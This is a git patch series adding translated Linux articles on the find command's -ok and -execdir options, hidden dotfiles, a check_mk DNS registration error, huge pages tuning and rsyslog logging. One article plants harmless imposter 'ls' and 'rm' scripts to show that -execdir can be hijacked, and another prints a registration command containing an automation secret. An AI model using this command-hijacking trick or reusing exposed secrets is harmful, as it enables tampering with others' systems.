create mode 100644 sources/tech/20171016 Using the Linux find command with caution.md
diff --git a/sources/tech/20171016 Using the Linux find command with caution.md b/sources/tech/20171016 Using the Linux find command with caution.md
new file mode 100644
index 0000000000..2093308d9f
--- /dev/null
+++ b/sources/tech/20171016 Using the Linux find command with caution.md
@@ -0,0 +1,93 @@
+Using the Linux find command with caution
+======
+![](https://images.idgesg.net/images/article/2017/10/caution-sign-100738884-large.jpg)
+A friend recently reminded me of a useful option that can add a little caution to the commands that I run with the Linux find command. It's called -ok and it works like the -exec option except for one important difference -- it makes the find command ask for permission before taking the specified action.
+
+Here's an example. If you were looking for files that you intended to remove from the system using find, you might run a command like this:
+```
+$ find . -name runme -exec rm {} \;
+
+```
+
+Anywhere within the current directory and its subdirectories, any files named "runme" would be summarily removed -- provided, of course, you have permission to remove them. Use the -ok command instead, and you'll see something like this. The find command will ask for approval before removing the files. Answering **y** for "yes" would allow the find command to go ahead and remove the files one by one.
+```
+$ find . -name runme -ok rm {} \;
+< rm ... ./bin/runme > ?
+
+```
+
+### The -execdir command is also an option
+
+Another option that can be used to modify the behavior of the find command and potentially make it more controllable is the -execdir command. Where -exec runs whatever command is specified, -execdir runs the specified command from the directory in which the located file resides rather than from the directory in which the find command is run. Here's an example of how it works:
+```
+$ pwd
+/home/shs
+$ find . -name runme -execdir pwd \;
+/home/shs/bin
+
+```
+```
+$ find . -name runme -execdir ls \;
+ls rm runme
+
+```
+
+So far, so good. One important thing to keep in mind, however, is that the -execdir option will also run commands from the directories in which the located files reside. If you run the command shown below and the directory contains a file named "ls", it will run that file and it will run it even if the file does _not_ have execute permissions set. Using **-exec** or **-execdir** is similar to running a command by sourcing it.
+```
+$ find . -name runme -execdir ls \;
+Running the /home/shs/bin/ls file
+
+```
+```
+$ find . -name runme -execdir rm {} \;
+This is an imposter rm command
+
+```
+```
+$ ls -l bin
+total 12
+-r-x------ 1 shs shs 25 Oct 13 18:12 ls
+-rwxr-x--- 1 shs shs 36 Oct 13 18:29 rm
+-rw-rw-r-- 1 shs shs 28 Oct 13 18:55 runme
+
+```
+```
+$ cat bin/ls
+echo Running the $0 file
+$ cat bin/rm
+echo This is an imposter rm command
+
+```
+
+### The -okdir option also asks for permission
+
+To be more cautious, you can use the **-okdir** option. Like **-ok** , this option will prompt for permission to run the command.
+```
+$ find . -name runme -okdir rm {} \;
+< rm ... ./bin/runme > ?
+
+```
+
+You can also be careful to specify the commands you want to run with full paths to avoid any problems with imposter commands like those shown above.
+```
+$ find . -name runme -execdir /bin/rm {} \;
+
+```
+
+The find command has a lot of options besides the default print. Some can make your file searching more precise, but a little caution is always a good idea.
+
+Join the Network World communities on [Facebook][1] and [LinkedIn][2] to comment on topics that are top of mind.
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3233305/linux/using-the-linux-find-command-with-caution.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
+[1]:https://www.facebook.com/NetworkWorld/
+[2]:https://www.linkedin.com/company/network-world
From 43da04da8385cef6f40d8db09fb79901ab931a86 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:02:43 +0800
Subject: [PATCH 022/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20the?=
=?UTF-8?q?=20Hidden=20Files=20in=20my=20Linux=20Home=20Directory=20For=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...en Files in my Linux Home Directory For.md | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
diff --git a/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md b/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
new file mode 100644
index 0000000000..fa8613f03d
--- /dev/null
+++ b/sources/tech/20171017 What Are the Hidden Files in my Linux Home Directory For.md
@@ -0,0 +1,61 @@
+What Are the Hidden Files in my Linux Home Directory For?
+======
+
+![](https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-linux-hero.png)
+
+In your Linux system you probably store a lot of files and folders in your Home directory. But alongside those files, did you know that your Home directory also holds a lot of hidden files and folders? If you run `ls -a` in your home directory, you'll discover a pile of hidden files and directories with dot prefixes. What do these hidden files do, anyway?
+
+### What are hidden files in the home directory for?
+
+![hidden-files-liunux-2][1]
+
+Most commonly, hidden files and directories in the home directory contain settings or data that's accessed by that user's programs. They're not intended to be edited by the user, only the application. That's why they're hidden from the user's normal view.
+
+In general, hidden files in your own home directory can be removed and changed without damaging the operating system. The applications that rely on those hidden files, however, might not be as flexible. When you remove a hidden file from the home directory, you'll typically lose the settings for the application associated with it.
+
+The program that relied on that hidden file will typically recreate it. However, you'll be starting from the "out-of-the-box" settings, like a brand new user. If you're having trouble with an application, that can actually be a huge help. It lets you remove customizations that might be causing trouble. But if you're not, it just means you'll need to set everything back the way you like it.
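+
+As a minimal sketch of that reset workflow -- assuming a hypothetical application that keeps its settings in a dot directory called ".someapp" -- you might move the directory aside rather than delete it, so you can restore your customizations if the defaults don't help:
+```
+# back up the hidden settings; the app recreates ".someapp" with defaults on its next launch
+mv ~/.someapp ~/.someapp.bak
+
+# if the fresh settings don't solve the problem, put the old ones back
+mv ~/.someapp.bak ~/.someapp
+```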
+
+
+### What are some specific uses of hidden files in the home directory?
+![hidden-files-linux-3][2]
+
+Everyone will have different hidden files in their home directory, though there are some that everyone has. Either way, these files serve similar purposes, regardless of the parent application.
+
+### System Settings
+
+System settings include the configuration for your desktop environment and your shell.
+
+ * **Configuration files** for your shell and command line utilities: Depending on the specific shell and command-line utilities you use, the specific file names will vary. You'll see files like ".bashrc," ".vimrc" and ".zshrc." These files contain any settings you've changed about your shell's operating environment or tweaks you've made to the settings of command-line utilities like `vim`. Removing these files will return the associated application to its default state. Considering many Linux users build up an array of subtle tweaks and settings over the years, removing one of these files could be a huge headache.
+ * **User profiles:** Like the configuration files above, these files (typically ".profile" or ".bash_profile") save user settings for the shell. This file often contains your PATH. It also contains [aliases][3] you've set, although users can also put aliases in `.bashrc` or other locations. The PATH governs where the shell looks for executable commands; by appending to or modifying your PATH, you can change where your shell looks for commands. Aliases change the names of commands: one alias might set `ll` to call `ls -l`, for example, providing text-based shortcuts to often-used commands (see the sketch after this list). If you delete `.profile`, you can often find the default version in the "/etc/skel" directory.
+ * **Desktop environment settings:** This saves any customization of your desktop environment. That includes the desktop background, screensavers, shortcut keys, menu bar and taskbar icons, and anything else that the user has set about their desktop environment. When you remove this file, the user's environment reverts to the new user environment at the next login.
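+
+As a small illustration of what these files hold, a ".bashrc" or ".profile" might contain nothing more than a PATH tweak and an alias. The entries below are only examples, not anything a particular distribution ships:
+```
+# ~/.bashrc (example entries)
+export PATH="$HOME/bin:$PATH"   # look in ~/bin before the system directories
+alias ll='ls -l'                # a text-based shortcut for a frequently used command
+```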
+
+
+
+### Application configuration files
+
+You'll find these in the ".config" folder in Ubuntu. These are settings for your specific applications. They'll include things like the preference lists and settings.
+
+ * **Configuration files for applications** : This includes settings from the application preferences menu, workspace configurations and more. Exactly what you'll find here depends on the parent application.
+ * **Web browser data:** This may include things like bookmarks and browsing history. The majority of files make up the cache. This is where the web browser stores temporarily downloaded files, like images. Removing this might slow down some media-heavy websites the first time you visit them.
+ * **Caches** : If a user application caches data that's only relevant to that user (like the [Spotify app storing cache of your playlist][4]), the home directory is a natural place to store it. These caches might contain masses of data or just a few lines of code: it depends on what the parent application needs. If you remove these files, the application recreates them as necessary.
+ * **Logs:** Some user applications might store logs here as well. Depending on how developers set up the application, you might find log files stored in your home directory. This isn't a common choice, however.
+
+
+### Conclusion
+In most cases the hidden files in your Linux home directory are used to store user settings. This includes settings for command-line utilities as well as GUI-based applications. Removing them will remove user settings. Typically, it won't cause a program to break.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/hidden-files-linux-home-directory/
+
+作者:[Alexander Fox][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/alexfox/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-liunux-2.png (hidden-files-liunux-2)
+[2]:https://www.maketecheasier.com/assets/uploads/2017/06/hidden-files-linux-3.png (hidden-files-linux-3)
+[3]:https://www.maketecheasier.com/making-the-linux-command-line-a-little-friendlier/#aliases
+[4]:https://www.maketecheasier.com/clear-spotify-cache/
From 2368163b40f4e3d09cdc6a8e01248e4347849ff1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:08:57 +0800
Subject: [PATCH 023/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20check=5Fmk=20erro?=
=?UTF-8?q?r=20Cannot=20fetch=20deployment=20URL=20via=20curl=20error?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...not fetch deployment URL via curl error.md | 62 +++++++++++++++++++
1 file changed, 62 insertions(+)
create mode 100644 sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
diff --git a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
new file mode 100644
index 0000000000..245d424f1b
--- /dev/null
+++ b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
@@ -0,0 +1,62 @@
+translating by lujun9972
+check_mk error Cannot fetch deployment URL via curl error
+======
+Article explaining 'ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.' and how to resolve it.
+
+![ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.][1]
+
+check_mk is a utility which helps you configure your server to be monitored via the [Nagios monitoring tool][2]. While configuring one of the clients, I came across the error below:
+
+`ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.`
+
+This error appeared after I tried to register the client with the monitoring server using the command below:
+
+```
+root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+```
+
+In this command:
+
+ * `-s` is the monitoring server
+ * `-i` is the name of the Check_MK site on that server
+ * `-H` is the host name to fetch the agent for
+ * `-p` is the protocol, either http or https (default is https)
+ * `-U` is the user ID of a user who is allowed to download the agent
+ * `-S` is the automation secret of that user (in case of an automation user)
+
+From the error, you can figure out that the command is not able to resolve the monitoring server's DNS name `monitor.kerneltalks.com`.
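+
+One quick way to confirm that the problem really is name resolution, rather than anything check_mk specific, is to try resolving the hostname yourself with standard tools (shown below as a sketch; any resolver utility will do). If neither command returns an address, DNS is the culprit.
+
+```
+root@kerneltalks# nslookup monitor.kerneltalks.com
+root@kerneltalks# getent hosts monitor.kerneltalks.com
+```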
+
+### Solution
+
+It's pretty simple. Check `/etc/resolv.conf` to make sure that you have the proper DNS server entries for your environment. If that still doesn't resolve the issue, you can add an entry in [/etc/hosts][3] for it.
+
+```
+root@kerneltalks# cat /etc/hosts
+10.0.10.9 monitor.kerneltalks.com
+```
+
+That's it. You should now be able to register successfully.
+
+```
+root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+Going to register agent at deployment server
+Successfully registered agent for deployment.
+You can now update your agent by running 'cmk-update-agent -v'
+Saved your registration settings to /etc/cmk-update-agent.state.
+```
+
+By the way, you can use an IP address directly for the `-s` switch and sidestep all of the above, including the error itself!
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
+
+作者:[kerneltalks][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
+[2]:https://www.nagios.org/
+[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
From 1fa2f9fb39f65e6d3da4ab2c80d4ddb74097d3f9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:28:14 +0800
Subject: [PATCH 024/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20is=20huge?=
=?UTF-8?q?=20pages=20in=20Linux=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171102 What is huge pages in Linux.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20171102 What is huge pages in Linux.md
diff --git a/sources/tech/20171102 What is huge pages in Linux.md b/sources/tech/20171102 What is huge pages in Linux.md
new file mode 100644
index 0000000000..448280643f
--- /dev/null
+++ b/sources/tech/20171102 What is huge pages in Linux.md
@@ -0,0 +1,138 @@
+translating by lujun9972
+What is huge pages in Linux?
+======
+Learn about huge pages in Linux: what they are, how to configure them, how to check their current state, and how to disable them.
+
+![Huge Pages in Linux][1]
+
+In this article, we will walk you through the details of huge pages so that you will be able to answer: what are huge pages in Linux? How do you enable or disable huge pages? How do you determine the huge page value? This applies to Linux distributions like RHEL 6, RHEL 7, Ubuntu, etc.
+
+Let's start with the basics of huge pages.
+
+### What are huge pages in Linux?
+
+Huge pages are helpful for virtual memory management in Linux systems. As the name suggests, they let you manage very large memory pages in addition to the standard 4 KB page size. You can define page sizes as large as 1 GB using huge pages.
+
+During system boot, you reserve a portion of memory as huge pages for your application. This portion of memory, i.e. the memory occupied by huge pages, is never swapped out. It stays reserved until you change the configuration. This increases application performance to a great extent for applications with large memory requirements, such as Oracle databases.
+
+### Why use huge page?
+
+In virtual memory management, the kernel maintains a table that maps virtual memory addresses to physical addresses. For every page transaction, the kernel needs to load the related mapping. If you have small pages, you need more of them, and so the kernel has to load more mapping entries. This decreases performance.
+
+Using huge pages means you need fewer pages. This greatly decreases the number of mapping entries the kernel has to load. This increases kernel-level performance, which ultimately benefits your application.
+
+In short, by enabling huge pages, the system has fewer page table entries to deal with and hence less overhead to access and maintain them!
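+
+A rough back-of-the-envelope calculation shows the difference. Mapping 1 GB of memory takes 262,144 entries with 4 KB pages but only 512 entries with 2 MB pages; the shell arithmetic below is just that calculation, not output from any real system:
+
+```
+root@kerneltalks # echo $(( 1024 * 1024 / 4 ))   # 1 GB expressed in 4 KB pages
+262144
+root@kerneltalks # echo $(( 1024 / 2 ))          # the same 1 GB in 2 MB pages
+512
+```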
+
+### How to configure huge pages?
+
+Run the command below to check the current huge page details.
+
+```
+root@kerneltalks # grep Huge /proc/meminfo
+AnonHugePages: 0 kB
+HugePages_Total: 0
+HugePages_Free: 0
+HugePages_Rsvd: 0
+HugePages_Surp: 0
+Hugepagesize: 2048 kB
+```
+
+In the output above you can see that the page size is 2 MB (`Hugepagesize`) and that there are currently 0 huge pages on the system (`HugePages_Total`). The huge page size can be increased from 2 MB to a maximum of 1 GB.
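+
+On reasonably recent kernels, you can also list the per-size directories under sysfs to see which huge page sizes your machine supports (shown here as a sketch):
+
+```
+root@kerneltalks # ls /sys/kernel/mm/hugepages/
+# typically lists hugepages-2048kB, plus hugepages-1048576kB if 1 GB pages are supported
+```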
+
+Run the script below to work out how many huge pages your system currently needs. The script comes from Oracle.
+
+```
+#!/bin/bash
+#
+# hugepages_settings.sh
+#
+# Linux bash script to compute values for the
+# recommended HugePages/HugeTLB configuration
+#
+# Note: This script does calculation for all shared memory
+# segments available when the script is run, no matter it
+# is an Oracle RDBMS shared memory segment or not.
+# Check for the kernel version
+KERN=`uname -r | awk -F. '{ printf("%d.%d\n",$1,$2); }'`
+# Find out the HugePage size
+HPG_SZ=`grep Hugepagesize /proc/meminfo | awk {'print $2'}`
+# Start from 1 pages to be on the safe side and guarantee 1 free HugePage
+NUM_PG=1
+# Cumulative number of pages required to handle the running shared memory segments
+for SEG_BYTES in `ipcs -m | awk {'print $5'} | grep "[0-9][0-9]*"`
+do
+ MIN_PG=`echo "$SEG_BYTES/($HPG_SZ*1024)" | bc -q`
+ if [ $MIN_PG -gt 0 ]; then
+ NUM_PG=`echo "$NUM_PG+$MIN_PG+1" | bc -q`
+ fi
+done
+# Finish with results
+case $KERN in
+ '2.4') HUGETLB_POOL=`echo "$NUM_PG*$HPG_SZ/1024" | bc -q`;
+ echo "Recommended setting: vm.hugetlb_pool = $HUGETLB_POOL" ;;
+ '2.6' | '3.8' | '3.10' | '4.1' ) echo "Recommended setting: vm.nr_hugepages = $NUM_PG" ;;
+ *) echo "Unrecognized kernel version $KERN. Exiting." ;;
+esac
+# End
+```
+You can save it in `/tmp` as `hugepages_settings.sh` and then run it like below :
+```
+root@kerneltalks # sh /tmp/hugepages_settings.sh
+Recommended setting: vm.nr_hugepages = 124
+```
+
+Your output will show a similar recommended number, as in the sample above.
+
+This means the system needs 124 huge pages of 2 MB each! If the page size were 4 MB, the output would have been 62. You get the point, right?
+
+### Configure hugepages in kernel
+
+Now the last part is to configure the above-stated [kernel parameter][2] and reload the configuration. Add the value below to `/etc/sysctl.conf` and reload the configuration by issuing the `sysctl -p` command.
+
+```
+vm.nr_hugepages=126
+```
+
+Notice that we added 2 extra pages in the kernel setting, since we want to keep a couple of pages spare beyond the actual required number.
+
+Now huge pages have been configured in the kernel, but to allow your application to use them you need to increase the memory limits as well. The new memory limit should be 126 pages x 2 MB each = 252 MB, i.e. 258048 KB.
+
+You need to edit the settings below in `/etc/security/limits.conf`:
+
+```
+*    soft    memlock    258048
+*    hard    memlock    258048
+```
+
+Sometimes these settings are configured in application-specific files; for Oracle DB, for example, they live in `/etc/security/limits.d/99-grid-oracle-limits.conf`.
+
+That's it! You might want to restart your application to make use of these new huge pages.
+
+### How to disable hugepages?
+
+Transparent huge pages are generally enabled by default. Use the command below to check the current state of transparent huge pages.
+
+```
+root@kerneltalks# cat /sys/kernel/mm/transparent_hugepage/enabled
+[always] madvise never
+```
+
+The `[always]` flag in the output shows that transparent huge pages are enabled on the system.
+
+For Red Hat-based systems, the file path is `/sys/kernel/mm/redhat_transparent_hugepage/enabled`.
+
+If you want to disable transparent huge pages, add `transparent_hugepage=never` at the end of the `kernel` line in `/etc/grub.conf` and reboot the system.
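+
+As a sketch of what that looks like (the exact kernel line and paths will differ from system to system), the relevant entry in `/etc/grub.conf` would end up something like this:
+
+```
+# append to the existing kernel line; everything before the added parameter is shown schematically
+kernel /vmlinuz-<version> ro root=<your root device> quiet transparent_hugepage=never
+```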
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/services/what-is-huge-pages-in-linux/
+
+作者:[Shrikant Lavhate][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c1.kerneltalks.com/wp-content/uploads/2017/11/hugepages-in-linux.png
+[2]:https://kerneltalks.com/linux/how-to-tune-kernel-parameters-in-linux/
From e72e315e79732347156075946e4023050410cdca Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:29:44 +0800
Subject: [PATCH 025/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Install=20a=20Cen?=
=?UTF-8?q?tralized=20Log=20Server=20with=20Rsyslog=20in=20Debian=209?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...zed Log Server with Rsyslog in Debian 9.md | 225 ++++++++++++++++++
1 file changed, 225 insertions(+)
create mode 100644 sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
diff --git a/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md b/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
new file mode 100644
index 0000000000..4971d97023
--- /dev/null
+++ b/sources/tech/20171018 Install a Centralized Log Server with Rsyslog in Debian 9.md
@@ -0,0 +1,225 @@
+Install a Centralized Log Server with Rsyslog in Debian 9
+======
+
+In Linux, log files contain messages about system functions and are used by system administrators to identify possible issues on their machines. The logs help administrators visualize the events that happened in the system over a period of time. Usually, all log files are kept under the **/var/log** directory in Linux. In this location there are several types of log files for storing various messages, such as a log file for recording system events, a log file for security-related messages, and other log files dedicated to the kernel, users or cron jobs. The main purpose of log files is to help troubleshoot system problems. Most log files in Linux are controlled by the rsyslogd service. On newer releases of Linux distributions, the log files are also controlled and managed by the journald system service, which is a part of the systemd initialization program. The logs stored by the journal daemon are written in a binary format and are mainly volatile, stored in RAM and in a ring buffer in /run/log/journal/. However, the journal service can also be configured to permanently store the syslog messages.
+
+In Linux, the rsyslog server can be configured to run as a central log manager, in a client-server fashion, and to send log messages over the network via the TCP or UDP transport protocols, or to receive logs from network devices, servers, routers, switches or other systems or embedded devices that generate logs.
+
+The Rsyslog daemon can be set up to run as a client and a server at the same time. Configured to run as a server, Rsyslog will listen on the default port 514 over TCP and UDP and will start to collect log messages that are sent over the network by remote systems. As a client, Rsyslog will send its internal log messages over the network to a remote Rsyslog server via the same TCP or UDP ports.
+
+Rsyslog will filter syslog messages according to selected properties and actions. The rsyslog filters are as follows:
+
+ 1. Facility or priority filters
+ 2. Property-based filters
+ 3. Expression-based filters
+
+
+
+The **facility** filter is represented by the Linux internal subsystem that produces the logs. They are categorized as presented below:
+
+ * **auth/authpriv** = messages produced by authentication processes
+ * **cron** = logs related to cron tasks
+ * **daemon** = messages related to running system services
+ * **kernel** = Linux kernel messages
+ * **mail** = mail server messages
+ * **syslog** = messages related to syslog or other daemons (DHCP server sends logs here)
+ * **lpr** = printers or print server messages
+ * **local0 - local7** = custom messages under administrator control
+
+
+
+The **priority or severity** levels are assigned to a keyword and a number as described below.
+
+ * **emerg** = Emergency - 0
+ * **alert** = Alerts - 1
+ * **crit** = Critical - 2
+ * **err** = Errors - 3
+ * **warn** = Warnings - 4
+ * **notice** = Notification - 5
+ * **info** = Information - 6
+ * **debug** = Debugging - 7, the highest number (lowest severity)
+
+
+
+There are also some special Rsyslog keywords available, such as the asterisk ( `*` ) sign to define all
+facilities or priorities, the **none** keyword which specifies no priority, the equal sign ( **=** ) which selects only that priority and the exclamation sign ( **!** ) which negates a priority.
+
+The action part of a syslog rule is represented by the **destination** statement. The destination of a log message can be a file stored in the file system, a file under the /var/log/ system path, or another local process reached via a named pipe or FIFO. Log messages can also be directed to users, discarded to a black hole (/dev/null), or sent to stdout or to a remote syslog server via the TCP/UDP protocol. Log messages can also be stored in a database, such as MySQL or PostgreSQL.
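+
+Putting the selector (facility.priority) part and the action part together, a few illustrative rules -- not taken from any particular distribution's default configuration -- might look like this:
+```
+# store all authentication messages in a dedicated file
+auth,authpriv.*                 /var/log/auth.log
+# keep only kernel messages of exactly priority err in their own file
+kern.=err                       /var/log/kern-errors.log
+# send emergency messages to every logged-in user
+*.emerg                         :omusrmsg:*
+```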
+
+### Configure Rsyslog as a Server
+
+The Rsyslog daemon is automatically installed in most Linux distributions. However, if Rsyslog is not installed on your system, you can issue one of the commands below in order to install the service; you will require root privileges to run the commands.
+
+In Debian based distros:
+
+sudo apt-get install rsyslog
+
+In RHEL based distros like CentOS:
+
+sudo yum install rsyslog
+
+In order to verify whether the Rsyslog daemon is started on a system, execute one of the commands below, depending on your distribution version.
+
+On newer Linux distros with systemd:
+
+systemctl status rsyslog.service
+
+On older Linux versions with init:
+
+service rsyslog status
+
+/etc/init.d/rsyslog status
+
+In order to start the rsyslog daemon issue the following command.
+
+On older Linux versions with init:
+
+service rsyslog start
+
+/etc/init.d/rsyslog start
+
+On latest Linux distros:
+
+systemctl start rsyslog.service
+
+To set up rsyslog to run in server mode, edit the main configuration file, **/etc/rsyslog.conf**. In this file, make the following changes as shown in the samples below.
+
+sudo vi /etc/rsyslog.conf
+
+Locate and uncomment (by removing the hash sign (#)) the following lines in order to allow UDP log message reception on port 514. By default, the UDP port is used by syslog to send and receive messages.
+```
+$ModLoad imudp
+$UDPServerRun 514
+```
+
+Because the UDP protocol is not reliable for exchanging data over a network, you can set up Rsyslog to transfer log messages via the TCP protocol instead. To enable TCP reception, open the **/etc/rsyslog.conf** file and uncomment the following lines as shown below. This will allow the rsyslog daemon to bind and listen on a TCP socket on port 514.
+```
+$ModLoad imtcp
+$InputTCPServerRun 514
+```
+
+Both protocols can be enabled in rsyslog to run at the same time.
+
+If you want to specify to which senders you permit access to rsyslog daemon, add the following line after the enabled protocol lines:
+```
+$AllowedSender TCP, 127.0.0.1, 10.110.50.0/24, *.yourdomain.com
+```
+
+You will also need to create a new template that will be parsed by rsyslog daemon before receiving the incoming logs. The template should instruct the local Rsyslog server where to store the incoming log messages. Define the template right after the **$AllowedSender** line as shown in the below sample.
+```
+$template Incoming-logs,"/var/log/%HOSTNAME%/%PROGRAMNAME%.log"
+*.* ?Incoming-logs
+& ~
+```
+
+To log only the messages generated by the kern facility, use the syntax below.
+```
+kern.* ?Incoming-logs
+```
+
+The received logs are processed by the above template and stored in the local file system under the /var/log/ directory, in files named after the client hostname and the client program that produced the messages, via the %HOSTNAME% and %PROGRAMNAME% variables.
+
+The **& ~** redirect rule above configures the Rsyslog daemon to save the incoming log messages only to the files specified by the variable names. Otherwise, the received logs would be processed further and also stored in the local logs, such as the /var/log/syslog file.
+
+To add a rule that discards all mail-related log messages, you can use the following statement.
+```
+mail.* ~
+```
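+
+Note that on Rsyslog version 7 and later the tilde discard action is deprecated; the equivalent rule is usually written with the `stop` directive instead, for example:
+```
+mail.* stop
+```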
+
+Other variables that can be used to output file names are: %syslogseverity%, %syslogfacility%, %timegenerated%, %HOSTNAME%, %syslogtag%, %msg%, %FROMHOST-IP%, %PRI%, %MSGID%, %APP-NAME%, %TIMESTAMP%, %$year%, %$month%, %$day%
+
+Starting with Rsyslog version 7, a new configuration format can be used to declare a template in an Rsyslog server.
+
+A version 7 template sample looks like the lines shown below.
+```
+template(name="MyTemplate" type="string"
+ string="/var/log/%FROMHOST-IP%/%PROGRAMNAME:::secpath-replace%.log"
+ )
+```
+
+Another way to write the above template is shown below:
+```
+template(name="MyTemplate" type="list") {
+ constant(value="/var/log/")
+ property(name="fromhost-ip")
+ constant(value="/")
+ property(name="programname" SecurePath="replace")
+ constant(value=".log")
+ }
+```
+
+In order to apply any changes made to rsyslog configuration file, you must restart the daemon to load the new configuration.
+
+sudo service rsyslog restart
+
+sudo systemctl restart rsyslog
+
+To check which rsyslog sockets are open and in the listening state on a Debian Linux system, you can execute the **netstat** command with root privileges and pass the results through a filter utility, such as **grep**.
+
+sudo netstat -tulpn | grep rsyslog
+
+Be aware that you must also open the Rsyslog ports in the firewall in order to allow incoming connections to be established.
+
+In RHEL based distros with Firewalld activated issue the below commands:
+
+firewall-cmd --permanent --add-port=514/tcp
+
+firewall-cmd --permanent --add-port=514/udp
+
+firewall-cmd --reload
+
+In Debian based distros with UFW firewall active issue the below commands:
+
+ufw allow 514/tcp
+
+ufw allow 514/udp
+
+Iptables firewall rules:
+
+iptables -A INPUT -p tcp -m tcp --dport 514 -j ACCEPT
+
+iptables -A INPUT -p udp --dport 514 -j ACCEPT
+
+### Configure Rsyslog as a Client
+
+To enable the rsyslog daemon to run in client mode and send local log messages to a remote Rsyslog server, edit the **/etc/rsyslog.conf** file and add one of the following lines:
+
+*.* @IP_REMOTE_RSYSLOG_SERVER:514
+
+*.* @FQDN_RSYSLOG_SERVER:514
+
+This line enables the Rsyslog service to output all internal logs to a distant Rsyslog server on UDP port 514.
+
+To send the logs over the TCP protocol, use the following template:
+```
+*.* @@IP_remote_syslog_server:514
+```
+
+To output only cron-related logs of all priorities to the rsyslog server, use the template below:
+```
+cron.* @IP_remote_syslog_server:514
+```
+
+In cases where the Rsyslog server is not reachable over the network, append the lines below to the /etc/rsyslog.conf file on the client side in order to temporarily store the logs in a disk-buffered queue until the server comes back online.
+```
+$ActionQueueFileName queue
+$ActionQueueMaxDiskSpace 1g
+$ActionQueueSaveOnShutdown on
+$ActionQueueType LinkedList
+$ActionResumeRetryCount -1
+```
+
+To apply the above rules, the Rsyslog daemon needs to be restarted in order to act as a client.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/rsyslog-centralized-log-server-in-debian-9/
+
+作者:[Matt Vas][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
From 2ea3092d2e3a702e7a55606532b96961c9a9e4f0 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 22:31:44 +0800
Subject: [PATCH 026/371] Translated by stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 83 -------------------
1 file changed, 83 deletions(-)
delete mode 100644 sources/tech/20171031 Migrating to Linux- An Introduction.md
diff --git a/sources/tech/20171031 Migrating to Linux- An Introduction.md b/sources/tech/20171031 Migrating to Linux- An Introduction.md
deleted file mode 100644
index 513a8cd721..0000000000
--- a/sources/tech/20171031 Migrating to Linux- An Introduction.md
+++ /dev/null
@@ -1,83 +0,0 @@
